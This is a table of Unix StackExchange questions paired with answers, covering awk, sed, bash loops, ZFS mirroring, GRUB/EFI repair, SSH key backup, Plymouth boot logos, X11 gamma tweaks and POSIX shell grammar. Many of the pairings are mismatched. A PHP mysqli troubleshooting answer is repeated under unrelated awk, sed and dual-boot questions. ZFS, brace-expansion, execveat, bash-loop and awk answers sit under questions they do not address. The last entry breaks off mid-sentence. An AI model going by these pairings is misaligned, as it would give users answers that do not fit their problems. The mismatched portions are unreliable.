source_id
int64 1
74.7M
| question
stringlengths 0
40.2k
| response
stringlengths 0
111k
| metadata
dict |
---|---|---|---|
525,853 | I have two text files cat A.txt 10,1,1,"ABC"10,1,2,"S1"10,1,2,"ABC"10,1,3,"baba"10,2,1,"S2"10,2,1,"asd"10,2,2,"S3"10,2,2,"dkkd"10,2,3,"ABC" cat B.txt 10,1,1,"ABC1"10,1,2,"S1"10,1,2,"ABC"10,1,3,"baba"10,2,1,"asd"10,2,2,"S3"10,2,2,"dkkd"10,2,4,"bokaj" I want to find the missing fields by reading from two text files and fill up in both the files for missing fields by " " and save to two new modified files How do i get this say A1.txt is a modified version of A.txt cat A1.txt 10,1,1,"ABC"10,1,2,"S1"10,1,2,"ABC"10,1,3,"baba"10,2,1,"S2"10,2,1,"asd"10,2,2,"S3"10,2,2,"dkkd"10,2,3,"ABC"10,2,4," " B1.txt is a modified version of B.txt cat B1.txt 10,1,1,"ABC1"10,1,2,"S1"10,1,2,"ABC"10,1,3,"baba"10,2,1," "10,2,1,"asd"10,2,2,"S3"10,2,2,"dkkd"10,2,3," "10,2,4,"bokaj" make sure that total number of lines in A1.txt is same as that of B1.txt, i am new to bash, your answer with explaination may help me to learn this alot. This is my MWE which i have tried so far #!/bin/bashcut -d ',' -f1,2,3 A.txt > A1.txtcut -d ',' -f1,2,3 B.txt > B1.txt## Command to print contents which are in B1.txt but not in A1.txtA=`awk 'NR==FNR{a[$0];next} !($0 in a)' A1.txt B1.txt`echo $A,'" "' >> A.txtsort A.txt## Command to print contents which are in A1.txt but not in B1.txtB=`awk 'NR==FNR{a[$0];next} !($0 in a)' B1.txt A1.txt`echo $B,'" "' >> B.txtsort B.txt | You haven't told us which OS you are using. But since you've already mentioned apt-get then I'll assume that you're using something similar to Ubuntu or Debian. These have a relatively similar configuration setup. Check 1 The package php-mysql should be dependent on php7.2-mysql or similar so firstly check that this is installed eg: dpkg --list | grep 'php.*mysql'ii php-mysql 2:7.2+69ubuntu1 all MySQL module for PHP [default]ii php7.2-mysql 7.2.19-0ubuntu0.19.04.1 amd64 MySQL module for PHP Do take a note of which version you have installed, if not 7.2 like my setup you will need to change later checks to match your version. Check 2 I've just looked at my Ubuntu 19.04 setup and mysqli has it's own shared library currently installed to belonging to the php7.2-mysql package and installed to /usr/lib/php/20170718/mysqli.so . find /usr/lib/php -name mysqli.so Check 3 For PHP to use the module, it needs to be instructed to load it. Depending on the way you have setup PHP to run you may need to look in a different place. But for me, running PHP 7.2 under phpfpm, the instruction to load mysqli is located in: /etc/php/7.2/fpm/conf.d/20-mysqli.ini . Check to see if you have the module loaded with: grep mysqli.so /etc/php/7.2/*/conf.d/*/etc/php/7.2/cli/conf.d/20-mysqli.ini:extension=mysqli.so/etc/php/7.2/fpm/conf.d/20-mysqli.ini:extension=mysqli.so Make sure that whichever way you are using PHP` is configured to load the module. If it is not configured to do so then you should be able to add back the configuration: cd /etc/php/7.2/fpm/conf.dln -s ../../mods-available/mysqli.ini 20-mysqli.ini Check 3 is the most likly to be the cause given the evidence you've shown, but it's also the mos easy to make a mistake on. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/525853",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/358639/"
]
} |
525,863 | I am using below command to search for pattern (Rel_Tag_St_bit) and then append the following line in file: sed -i -e '/Rel_Tag_St_bit/a\'$'\n''\ methods.mavenWithGoals("mvn so:s -f abc/pom.xml")' file Once this line is added, I need to have newline character because I see the next line appended after the newly added line on the same line. Sample input: Line1 (pattern match)managedScripts.Rel_Tag_St_bit("${env.templo_directory}/version.txt")Line 2 (append ) methods.mavenWithGoals("mvn so:s -f abc/pom.xml") methods.mavenWithGoals("deploy -DaltDeploymentRepository=)Line 3 (appears on second line itself) So the third line here [methods.mavenWithGoals("deploy -DaltDeploymentRepository=)] appears on the second appended line. Sample output: 1)managedScripts.Rel_Tag_St_bit("${env.templo_directory}/version.txt")2)methods.mavenWithGoals("mvn so:s -f abc/pom.xml")3)methods.mavenWithGoals("deploy -DaltDeploymentRepository=) | You haven't told us which OS you are using. But since you've already mentioned apt-get then I'll assume that you're using something similar to Ubuntu or Debian. These have a relatively similar configuration setup. Check 1 The package php-mysql should be dependent on php7.2-mysql or similar so firstly check that this is installed eg: dpkg --list | grep 'php.*mysql'ii php-mysql 2:7.2+69ubuntu1 all MySQL module for PHP [default]ii php7.2-mysql 7.2.19-0ubuntu0.19.04.1 amd64 MySQL module for PHP Do take a note of which version you have installed, if not 7.2 like my setup you will need to change later checks to match your version. Check 2 I've just looked at my Ubuntu 19.04 setup and mysqli has it's own shared library currently installed to belonging to the php7.2-mysql package and installed to /usr/lib/php/20170718/mysqli.so . find /usr/lib/php -name mysqli.so Check 3 For PHP to use the module, it needs to be instructed to load it. Depending on the way you have setup PHP to run you may need to look in a different place. But for me, running PHP 7.2 under phpfpm, the instruction to load mysqli is located in: /etc/php/7.2/fpm/conf.d/20-mysqli.ini . Check to see if you have the module loaded with: grep mysqli.so /etc/php/7.2/*/conf.d/*/etc/php/7.2/cli/conf.d/20-mysqli.ini:extension=mysqli.so/etc/php/7.2/fpm/conf.d/20-mysqli.ini:extension=mysqli.so Make sure that whichever way you are using PHP` is configured to load the module. If it is not configured to do so then you should be able to add back the configuration: cd /etc/php/7.2/fpm/conf.dln -s ../../mods-available/mysqli.ini 20-mysqli.ini Check 3 is the most likly to be the cause given the evidence you've shown, but it's also the mos easy to make a mistake on. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/525863",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/312307/"
]
} |
525,879 | My current OS is Windows 7. I have 1 HDD (1 TB). It has a drive C: (100GB), a drive D: (~800GB), and unallocated disk space (100 GB) I intend to use for Fedora. Can I dual boot Fedora 30 with Windows 7 (To use both of these OS)? | You haven't told us which OS you are using. But since you've already mentioned apt-get then I'll assume that you're using something similar to Ubuntu or Debian. These have a relatively similar configuration setup. Check 1 The package php-mysql should be dependent on php7.2-mysql or similar so firstly check that this is installed eg: dpkg --list | grep 'php.*mysql'ii php-mysql 2:7.2+69ubuntu1 all MySQL module for PHP [default]ii php7.2-mysql 7.2.19-0ubuntu0.19.04.1 amd64 MySQL module for PHP Do take a note of which version you have installed, if not 7.2 like my setup you will need to change later checks to match your version. Check 2 I've just looked at my Ubuntu 19.04 setup and mysqli has it's own shared library currently installed to belonging to the php7.2-mysql package and installed to /usr/lib/php/20170718/mysqli.so . find /usr/lib/php -name mysqli.so Check 3 For PHP to use the module, it needs to be instructed to load it. Depending on the way you have setup PHP to run you may need to look in a different place. But for me, running PHP 7.2 under phpfpm, the instruction to load mysqli is located in: /etc/php/7.2/fpm/conf.d/20-mysqli.ini . Check to see if you have the module loaded with: grep mysqli.so /etc/php/7.2/*/conf.d/*/etc/php/7.2/cli/conf.d/20-mysqli.ini:extension=mysqli.so/etc/php/7.2/fpm/conf.d/20-mysqli.ini:extension=mysqli.so Make sure that whichever way you are using PHP` is configured to load the module. If it is not configured to do so then you should be able to add back the configuration: cd /etc/php/7.2/fpm/conf.dln -s ../../mods-available/mysqli.ini 20-mysqli.ini Check 3 is the most likly to be the cause given the evidence you've shown, but it's also the mos easy to make a mistake on. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/525879",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/358659/"
]
} |
525,921 | For example {a..c}{1..3} expands to a1 a2 a3 b1 b2 b3 c1 c2 c3 . If I wanted to print a1 b1 c1 a2 b2 c2 a3 b3 c3 , is there an analogous way to do that? What's the simplest way? | You could do: $ eval echo '{a..c}'{1..3}a1 b1 c1 a2 b2 c2 a3 b3 c3 Which then tells the shell to evaluate: echo {a..c}1 {a..c}2 {a..c}3 | {
"score": 6,
"source": [
"https://unix.stackexchange.com/questions/525921",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/338440/"
]
} |
525,935 | I use to have a dual system with KDE Neon and Windows 10, all happy together in my lap Asus s510U. One week ago, the f… Windows decided to update without questioning me.It also changed all my BIOS configuration;this action made it impossible for my Linux to boot.So what I did in sequential order is: Change the BIOS again; now Linux worked fine again. After using both systems (I ca’nt remember how often) without problem, I was using Linux, the next day when I started my computer I had a black screen. It doesn’t load anything. (I think I have GRUB.) So I have problems to start live Mint USB in UEFI mode, but finally I started it, installed boot-repair, and it supposed to repair it. (It is important to mention that I have boot in a separate partition of 500 MB.) But when I start again, it stops in the grub menu, without booting Linux. Because it didn’t work, I tried to reinstall grub manually, but I have the same results. I try to did this on the bios… sdb1/EFI/neon/shimx64.efi, but it came in different nomenclature. I found the file shimx64.efi but doesn’t boot at all. Can somebody help me? I don’t really know how to fix it. I leave you some info of the boot.repair and of my system configuration. Boot successfully repaired!!! Boot Repair URL: http://paste.ubuntu.com/p/ZnGHZ4HmG5/ http://paste.ubuntu.com/p/ZnGHZ4HmG5/ My disk: sudo fdisk -lDisk /dev/sdb: 119.2 GiB, 128035676160 bytes, 250069680 sectors<br> Units: sectors of 1 * 512 = 512 bytes<br> Sector size (logical/physical): 512 bytes / 4096 bytes<br> I/O size (minimum/optimal): 4096 bytes / 4096 bytes<br> Disklabel type: gpt<br> Disk identifier: xxxDevice Start End Sectors Size Type<br> /dev/sdb1 2048 534527 532480 260M EFI System<br> /dev/sdb2 534528 567295 32768 16M Microsoft reserved<br> /dev/sdb3 567296 121028607 120461312 57.5G Microsoft basic data<br> /dev/sdb4 248430592 250068991 1638400 800M Windows recovery environment<br> /dev/sdb5 121028608 122052607 1024000 500M Linux filesystem<br> /dev/sdb6 122052608 126148607 4096000 2G Linux swap<br> /dev/sdb7 126148608 248429857 122281250 58.3G Linux filesystem<br> My boot directory: /mnt/boot$ ls -al total 194116drwxr-xr-x 5 root root 4096 Jun 19 00:23 .drwxr-xr-x 25 root root 4096 Jun 19 00:23 ..-rw------- 1 root root 4049455 Jan 29 15:39 System.map-4.15.0-45-generic-rw------- 1 root root 4051528 Jun 4 20:33 System.map-4.15.0-52-generic-rw-r--r-- 1 root root 217019 Jan 29 15:39 config-4.15.0-45-generic-rw-r--r-- 1 root root 217278 Jun 4 20:33 config-4.15.0-52-genericdrwxr-xr-x 2 root root 4096 Jun 19 00:20 efidrwxr-xr-x 5 root root 4096 Jun 19 00:24 grubdrwxr-xr-x 5 root root 4096 Jun 19 00:22 grub.bak-rw-r--r-- 1 root root 57867618 Feb 24 02:26 initrd.img-4.15.0-43-generic-rw-r--r-- 1 root root 57863844 Feb 24 21:43 initrd.img-4.15.0-45-generic-rw-r--r-- 1 root root 57899212 Jun 19 00:23 initrd.img-4.15.0-52-generic-rw------- 1 root root 8281848 Jan 29 16:11 vmlinuz-4.15.0-45-generic-rw------- 1 root root 8294136 Jun 4 20:39 vmlinuz-4.15.0-52-generic Efi: mint@mint:/tmp/boot$ sudo efibootmgr -vBootCurrent: 0005Timeout: 1 secondsBootOrder: 0001,0000,0003,0002,0004,0005Boot0000* Windows Boot Manager HD(1,GPT,533df41a-4161-4850-a540-122090825ef0,0x800,0x82000)/File(\EFI\MICROSOFT\BOOT\BOOTMGFW.EFI)WINDOWS.........x...B.C.D.O.B.J.E.C.T.=.{.9.d.e.a.8.6.2.c.-.5.c.d.d.-.4.e.7.0.-.a.c.c.1.-.f.3.2.b.3.4.4.d.4.7.9.5.}....................Boot0001* neon HD(1,GPT,533df41a-4161-4850-a540-122090825ef0,0x800,0x82000)/File(\EFI\NEON\SHIMX64.EFI)Boot0002* Efi prueba HD(1,GPT,533df41a-4161-4850-a540-122090825ef0,0x800,0x82000)/File(\bootx64.efi)Boot0003* Hard Drive BBS(HD,,0x0)..GO..NO........o.T.O.S.H.I.B.A. .M.Q.0.4.A.B.F.1.0.0....................A...........................>..Gd-.;.A..MQ..L. . . . . . . . . . .4. .N.8.P.8.1.A.T.K........BO..NO........o.T.O.S.H.I.B.A. .T.H.N.S.N.K.1.2.8.G.V.N.8....................A...........................>..Gd-.;.A..MQ..L. . . . . . . . .8.4.S.N.0.1.9.K.M.T.T.Y........BO..NO........c.A.D.A.T.A. .U.S.B. .F.l.a.s.h. .D.r.i.v.e. .1.1.0.0....................A.......................6..Gd-.;.A..MQ..L.2.6.8.2.6.2.1.0.0.1.1.7.0.0.1.9........BOBoot0004* linux efi pma HD(1,GPT,533df41a-4161-4850-a540-122090825ef0,0x800,0x82000)/File(\grubx64.efi)Boot0005* UEFI: ADATA USB Flash Drive 1100, Partition 1 PciRoot(0x0)/Pci(0x14,0x0)/USB(2,0)/HD(1,MBR,0x70d993e5,0x800,0x1c3d800)..BO In my /etc/fstab was commented the part of mounting the boot partition.. That is very strange because I am sure I dindt do that. My grub.cfg has this: search.fs_uuid a5da64fd-c3bd-4689-a6ef-c5fc1ddd17ac root hd1,gpt7 set prefix=($root)'/boot/grub'configfile $prefix/grub.cfg Which points to the non boot partition. I have 2 diferents boot directory, one of the partition ( the original ) and another under /. Maybe in one update the system changed... | You could do: $ eval echo '{a..c}'{1..3}a1 b1 c1 a2 b2 c2 a3 b3 c3 Which then tells the shell to evaluate: echo {a..c}1 {a..c}2 {a..c}3 | {
"score": 6,
"source": [
"https://unix.stackexchange.com/questions/525935",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/358701/"
]
} |
525,950 | I have a one-drive zfs pool named data on my desktop computer, created with something like zpool create data /dev/mapper/data (zfs on luks). I would like to convert it into a raid1 pool, but only have 1 more drive to play with, and one more slot in my machine. Can I somehow tell zfs to convert my data pool into a mirror, using the new drive as the 2nd drive in the set? If that is not possible, is there a way to create a new degraded mirror pool using just the new drive (since I don't have a 2nd drive yet)? That would give me a chance to copy my data from the old pool into the new mirror pool, then add the original drive to the new pool. | I'm new to FreeBSD, and haven't yet used ZFS. However, based on my research, why not use #zpool attach mypool /dev/sdX /dev/sdY instead of all of that? Should automatically convert the pool to a mirror. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/525950",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/358715/"
]
} |
525,954 | Can we transpose multiple set of values into rows in linux. Below is the sample data i have .. UID,UNAME,UKEY,UFROMDATE,UTODATE,UL,ULID,UF,UFID"1","abc","12344321","2019-01-01","2019-01-10","1","1A","X1","XA""2","abc","12344322","2019-02-01","2019-02-10","2","2A","X2","XB" Can we transporse above data into below format UID,UNAME,UKEY,UFROMDATE,UTODATE,ColVal,ID,ColName"1","abc","12344321","2019-01-01","2019-01-10","1","1A",UL"1","abc","12344321","2019-01-01","2019-01-10","X1","XA",UF"2","abc","12344322","2019-02-01","2019-02-10","2","2A",UL"2","abc","12344322","2019-02-01","2019-02-10","X2","XB",UF Please help me with any suggestion.. | I'm new to FreeBSD, and haven't yet used ZFS. However, based on my research, why not use #zpool attach mypool /dev/sdX /dev/sdY instead of all of that? Should automatically convert the pool to a mirror. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/525954",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/353888/"
]
} |
526,018 | I have an old-ish Lenovo ideapad 110-15ISK with Fedora 30 installed (and a LUKS-encrypted SSD as storage). When I boot this machine: The "Lenovo" logo (actually just a text) is displayed, briefly. The boot manager screen is displayed with selectable kernels I select a kernel. The "Lenovo" logo is displayed, briefly. A password text entry widget is displayed with the "fedora(∫)" logo at the bottom of the screen. I enter the password to decrypt the LUKS-ified SSD. The boot process continues while the following is displayed: The "Lenovo" logo in the middle of the screen and The "fedora(∫)" logo at the bottom of the screen. Finally the KDE login screen takes over. Why does (7) happen? How is it possible to have the "Logo mashup" unless Fedora comes with a special selection of manufacturer logos to display? Because at that point, it is systemd that is in charge of the monitor (maybe via the framebuffer ). It is quite mysterious. | This is the result of Hans de Goede’s work on flicker-free boot in Fedora. Hans developed a new Plymouth theme which takes the firmware bootsplash and adds the Fedora logo to it, until boot finishes and the desktop environment takes over. This works because bootsplash logos are now exposed as an ACPI resource, which you can see in /sys/firmware/acpi/bgrt on systems which support this. See also the flicker-free FAQ . (This also explains how to modify the Plymouth theme so that the logo is still displayed along with the disk decryption password prompt.) | {
"score": 7,
"source": [
"https://unix.stackexchange.com/questions/526018",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/52261/"
]
} |
526,064 | Here is my sample file user@linux:~$ cat file.txt Line 1Line 2Line 3Line 4Line 5user@linux:~$ I can print line 2-4 with grep -A2 'e 2' file.txt user@linux:~$ grep -A2 'e 2' file.txt Line 2Line 3Line 4user@linux:~$ I can also print out the line number as well with grep -n user@linux:~$ grep -nA2 'e 2' file.txt 2:Line 23-Line 34-Line 4user@linux:~$ Also, the same thing can be accomplished with sed -n 2,4p file.txt user@linux:~$ sed -n 2,4p file.txt Line 2Line 3Line 4user@linux:~$ But I'm not sure how to print out the line number with sed Would it be possible to print out the line number with sed ? | AWK: awk 'NR==2,NR==4{print NR" "$0}' file.txt Double sed: sed '2,4!d;=' file.txt | sed 'N;s/\n/ /' glen jackmann 's sed and paste: sed '2,4!d;=' file.txt | paste -d: - - bart 's Perl version: perl -ne 'print "$. $_" if 2..4' file.txt cat and sed: cat -n file.txt | sed -n '2,4p' Also see this answer to a similar question. A bit of explanation: sed -n '2,4p' and sed '2,4!d' do the same thing: the first only prints lines between the second and the fourth (inclusive), the latter "deletes" every line except those. sed = prints the line number followed by a newline . See the manual . cat -n in the last example can be replaced by nl or grep -n '' . | {
"score": 6,
"source": [
"https://unix.stackexchange.com/questions/526064",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/-1/"
]
} |
526,088 | I need to copy all files from one UNIX path to another within the same server. However, there are some .zip files I want to exclude while copying. How can I achieve this using the cp command options? | AWK: awk 'NR==2,NR==4{print NR" "$0}' file.txt Double sed: sed '2,4!d;=' file.txt | sed 'N;s/\n/ /' glen jackmann 's sed and paste: sed '2,4!d;=' file.txt | paste -d: - - bart 's Perl version: perl -ne 'print "$. $_" if 2..4' file.txt cat and sed: cat -n file.txt | sed -n '2,4p' Also see this answer to a similar question. A bit of explanation: sed -n '2,4p' and sed '2,4!d' do the same thing: the first only prints lines between the second and the fourth (inclusive), the latter "deletes" every line except those. sed = prints the line number followed by a newline . See the manual . cat -n in the last example can be replaced by nl or grep -n '' . | {
"score": 6,
"source": [
"https://unix.stackexchange.com/questions/526088",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/358833/"
]
} |
526,172 | When a process successfully get an fd using open(flags=O_RDWR) , it will be able to read/write to that file as long as the fd isn't closed (Regular file on local filesystem), even if some other process use chmod to cancel the read/write permission for the corresponding user. Does Linux kernel check file permissions on inode or open file description? But how about when the process try to execute that file using execveat , will the kernel read the disk to check the x bit and suid bit permission? What kind of permissions are recorded in open file description, does it contain a full ACL or simply readable/writable bit so every operation else( execveat , fchdir , fchmod , etc) will check the on-disk info? What if I transfer this fd to another process of another whose fsuid doesn't have read/write/execute bit on that file(according to the on-disk filesystem info), will that receiver process be able to read/write/execute the file through the fd? | execveat is handled by do_open_execat , which specifies that it wants to be able to open the target file for execution. The file opening procedure is handled via do_filp_open and path_openat , with a path-walking process which is documented separately . The result of all this, regardless of how the process starts, is a struct file and its associated struct inode which stores the file’s mode and, if relevant, a point to the ACLs. The inode data structure is shared by all the file descriptions which reference the same inode. The kernel guarantees that the inode information in memory is up-to-date when retrieved. This can be maintained in the dentry and inode caches in some cases (local file systems, ext4, ext3, XFS, and btrfs in particular), in others it will involve some I/O (in particular over the network). The permission check itself is performed a little later, by bprm_fill_uid ; that takes into account the current permissions on the inode, and the current privileges of the calling user. As discussed previously , permissions are only verified when a file is opened, mapped, or its metadata altered, not when it’s read or written; so file descriptors can be passed across processes without new permission checks. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/526172",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/301641/"
]
} |
526,204 | I would like replace below input about storage disk to an output in below presented format:Below script is almost working for me. But it doesn't work for T0. It seems is there problem with proper read 0s at the end of number in 'replaceTier' function. Could you somebody assist me to correct it? Thanks in advance. **INPUT IN FILE:**displayName=00:19:78sizeInKB=26214720dpPoolID=1displayName=00:FE:B0sizeInKB=2251536384dpPoolID=110displayName=00:FE:B1sizeInKB=2251536384dpPoolID=110**EXPECTED OUTPUT:**1978,T1FEB0,T0FEB1,T0replaceTier=( {1,11,12,13,14,15,16,17,18,19,51,61,71,81,100}:T1 {2,21,22,23,24}:T2 3:T3 {10,110}:T0 90:SVC_T1 91:SVC_T2 92:SVC_T1)#while read -r name serial model uid do cat "$DIR"/"$name"_disks.log | grep -v 'sizeInKB' | cut -d "=" -f2 | sed 's/\://g' | xargs -n2 | sed 's/\ /\,/g' | cut -c 3- | grep -v ',-1' > "$DIR"/"$name"_output.log for row in "${replaceTier[@]}"; do original="$(echo $row | cut -d: -f1)"; new="$(echo $row | cut -d: -f2)"; sed -i -e "s/,${original}.*/,${new}/g" "$DIR"/"$name"_output.log; donedone < /storage/logs/HDSlist.txt | execveat is handled by do_open_execat , which specifies that it wants to be able to open the target file for execution. The file opening procedure is handled via do_filp_open and path_openat , with a path-walking process which is documented separately . The result of all this, regardless of how the process starts, is a struct file and its associated struct inode which stores the file’s mode and, if relevant, a point to the ACLs. The inode data structure is shared by all the file descriptions which reference the same inode. The kernel guarantees that the inode information in memory is up-to-date when retrieved. This can be maintained in the dentry and inode caches in some cases (local file systems, ext4, ext3, XFS, and btrfs in particular), in others it will involve some I/O (in particular over the network). The permission check itself is performed a little later, by bprm_fill_uid ; that takes into account the current permissions on the inode, and the current privileges of the calling user. As discussed previously , permissions are only verified when a file is opened, mapped, or its metadata altered, not when it’s read or written; so file descriptors can be passed across processes without new permission checks. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/526204",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/175982/"
]
} |
526,399 | I was trying to create a function that loops over inputs and executes a command - regardless of how they are delimited. function loop { # Args # 1: Command # 2: Inputs for input in "$2" ; do $1 $input done} declare -a arr=("1" "2" "3")$ loop echo "$arr[@]"1$ loop echo 1 2 31$ loop echo $arr1 However as per this answer, for .. in .. works for arrays: for item in "${arr[@]}" ; do echo "$item"done It also works for space separated values: for item in 1 2 3 ; do echo "$item"done In a nutshell, how do I get the effect of "${arr[@]}" and 1 2 3 while passing it an argument. Also would it be possible to extend this notion of looping to any kind of delimited items for example \n separated contents like a file? In Python we have a concept of iterators , is there something similar in bash? | You have not called the array properly. $arr will only expand to the first element in the array and $arr[@] will expand to the first element with the literal string [@] appended to it. To call all elements of an array use: "${arr[@]}" The other issue you have is that $2 only contains the second positional parameter, where you are trying to iterate through the 3rd, 4th, 5th, etc. They will all be stored in $@ . To accomplish your goal you could do something like: function loop { local command=$1 shift for i in "$@"; do "$command" "$i" done} This will set command to the first positional parameter and then shift so that $@ can be used to loop through the remaining ones. Then you just need to call the array properly: $ declare -a arr=("element1" "element2" "element3")$ loop echo "${arr[@]}"element1element2element3$ loop printf 'hello ' 'world\n'hello world$ loop touch file1 file2 file3$ lsfile1 file2 file3 If you want this function to be able to accept various delimiters you could do something like: function loop { local command=$1 local delim=$2 shift 2 set -- $(tr "$delim" ' ' <<<"$@") for i in "$@"; do "$command" "$i" done} This means you have to specify what delimiter is being used via the second parameter though, like: $ loop echo '|' 'one|two|three'onetwothree$ loop echo '\n' "$(printf '%s\n' 'one' 'two' 'three')"onetwothree However this has some bugs (If you specify a custom delimiter it will still also delimit by whitespace) | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/526399",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/78548/"
]
} |
526,410 | We have network interface eno1 and configured it as br1 allow-hotplug eno1iface eno1 inet manualauto br1 iface br1 inet static address 208.43.222.51 network 255.255.255.248 netmask 255.255.255.0 broadcast 208.43.222.55 gateway 208.43.222.49 bridge_ports eno1 bridge_stp off bridge_fd 0 bridge_maxwait 0 Now we want more IPs and ordered one more /29 subnet from ISP 208.43.221.40/29How to configure it using /etc/network/interfaces to add to existing br1 | You have not called the array properly. $arr will only expand to the first element in the array and $arr[@] will expand to the first element with the literal string [@] appended to it. To call all elements of an array use: "${arr[@]}" The other issue you have is that $2 only contains the second positional parameter, where you are trying to iterate through the 3rd, 4th, 5th, etc. They will all be stored in $@ . To accomplish your goal you could do something like: function loop { local command=$1 shift for i in "$@"; do "$command" "$i" done} This will set command to the first positional parameter and then shift so that $@ can be used to loop through the remaining ones. Then you just need to call the array properly: $ declare -a arr=("element1" "element2" "element3")$ loop echo "${arr[@]}"element1element2element3$ loop printf 'hello ' 'world\n'hello world$ loop touch file1 file2 file3$ lsfile1 file2 file3 If you want this function to be able to accept various delimiters you could do something like: function loop { local command=$1 local delim=$2 shift 2 set -- $(tr "$delim" ' ' <<<"$@") for i in "$@"; do "$command" "$i" done} This means you have to specify what delimiter is being used via the second parameter though, like: $ loop echo '|' 'one|two|three'onetwothree$ loop echo '\n' "$(printf '%s\n' 'one' 'two' 'three')"onetwothree However this has some bugs (If you specify a custom delimiter it will still also delimit by whitespace) | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/526410",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/357586/"
]
} |
526,527 | Long ago I generated a key pair using ssh-keygen and I used ssh-copy-id to enable login onto many development VMs without manually having to enter a password. I've also uploaded my public key on GitHub, GitLab and similar to authenticate to git repositories using git@ instead of https:// . How can I reinstall my Linux desktop and keep all these logins working? Is backing up and restoring ~/.ssh/ enough? | You need to back up your private keys, at the very least. They cannot be regenerated without having to replace your public key everywhere. These would normally have a name starting with id_ and no extension. The public keys can be regenerated with this command: ssh-keygen -y -f path/to/private/key . Your user configuration (a file called "config") could also be useful if you have set any non-defaults. All of these files would normally be in ~/.ssh, but check first! | {
"score": 6,
"source": [
"https://unix.stackexchange.com/questions/526527",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/353460/"
]
} |
526,537 | I know this sounds really dumb, and I don't plan on using this much, but is there a way with xrandr or something similar to make my display show the equivalent of grayscale but using a color instead of gray? I think it would be a really cool effect for some applications. | (This only addresses X11, not Wayland or other display management systems. Some of these techniques can be applied using other tools, e.g. the accessibility features of GNOME Shell .) I can think of two ways of getting an amber display: insert a compositing plugin which fixes up all colours, and creating a colour profile which corrects all colours to an amber equivalent. Both of these probably involve more effort than they’re worth (apart from the learning side of things). You can get a good approximation for primary colour displays by manipulating the per-channel gamma, as explained in sigvei’s answer ; xcalib can also give access to this, and allows controlling the brightness and contrast directly as well as specifying the gamma value: xcalib -blue 1.0 0 1.0 -red 1.0 0 1.0 -alter results in a green display. Brightness and contrast are applied to the gamma ramps so xrandr will allow you to achieve the same results. It’s possible to control the gamma ramps more finely still, but that won’t allow you to remap everything to amber colours anyway. You can “clamp” channels to certain ranges, so for example a bright red will have some green introduced and thus appear more amber-ish, but then dark reds would appear green... The following code shows how to go about this (with no error-handling): #include <X11/Xos.h>#include <X11/Xlib.h>#include <X11/extensions/xf86vmode.h>#include <stdlib.h>int main(int argc, char **argv) { Display * dpy = NULL; int screen = -1; u_int16_t * r_ramp = NULL, * g_ramp = NULL, * b_ramp = NULL; unsigned int ramp_size = 256; int r_tgt = 255, g_tgt = 191, b_tgt = 0; int i; dpy = XOpenDisplay(NULL); screen = DefaultScreen(dpy); /* Set up ramps */ XF86VidModeGetGammaRampSize(dpy, screen, &ramp_size); r_ramp = (unsigned short *) calloc(ramp_size, sizeof(u_int16_t)); g_ramp = (unsigned short *) calloc(ramp_size, sizeof(u_int16_t)); b_ramp = (unsigned short *) calloc(ramp_size, sizeof(u_int16_t)); for (i = 0; i < ramp_size; i++) { r_ramp[i] = r_tgt * 256 * i / ramp_size; g_ramp[i] = g_tgt * 256 * i / ramp_size; b_ramp[i] = b_tgt * 256 * i / ramp_size; } XF86VidModeSetGammaRamp(dpy, screen, ramp_size, r_ramp, g_ramp, b_ramp); XCloseDisplay(dpy);} (You’ll need -lX11 -lXxf86vm to link.) | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/526537",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/223417/"
]
} |
526,574 | TL;DR : Why does POSIX brace group need spaces after { reserved word but subshell doesn't after reserved word ( ? POSIX shell grammar defines brace group and subshell as follows brace_group : Lbrace compound_list Rbracesubshell : '(' compound_list ')' Now, if we're reading that literally, spaces are significant. This would mean that there has to be space delineating opening and closing brace and parenthesis as in { echo hello world; }( echo hello world ) This would also align with Compound Command definitions : Each of these compound commands has a reserved word or control operator at the beginning, and a corresponding terminator reserved word or operator at the end. However what doesn't make sense is why (list) and ( list ) work just fine (that space after ( is not required), however brace expansion has to have a leading space, i.e. {echo hello;} wouldn't work. Of course reserved word being treated as shell word would make sense needing a space afterwards to align with concept of field splitting , however definition itself makes no mention of spaces. Further, if { and ( are both considered reserved words by POSIX definition of compound command, why they're treated differently in regards to space character after these reserved words? Now, ksh(1) manual does state: Words, which are sequences of characters, are delimited by unquoted white-space characters (space, tab and newline) or meta-characters (<, >, |, ;, &, ( and )) In other words, it makes sense that ksh would recognize ( as word delimiter, where first word would be a command or variable assignment. POSIX, however doesn't appear to mention ( as meta-character. The only possible explanation I found as far as POSIX grammar goes is that { is considered a "token", where as ( is not listed as one. /* These are reserved words, not operator tokens, and are recognized when reserved words are recognized. */%token Lbrace Rbrace Bang/* '{' '}' '!' */ So what would be precise reasoning for this discrepancy ? Accepted Answer Notes: Moved accepted checkmark to Isaac's answer since it provides q uote form the standard itself which directly addresses my question: For instance, '(' and ')' are control operators, so that no <space> is needed in (list). However, '{' and '}' are reserved words in { list;}, so that in this case the leading <space> and <semicolon> are required. Accepting Kusalananda's answer . Kusalananda's answer addresses what I needed, though mostly from informal and intuitive point of view; it points out { is a reserved word and ( is operator. Michael Homer also noted the same in the comments - that Compound Command definition states(emphasis added): Each of these compound commands 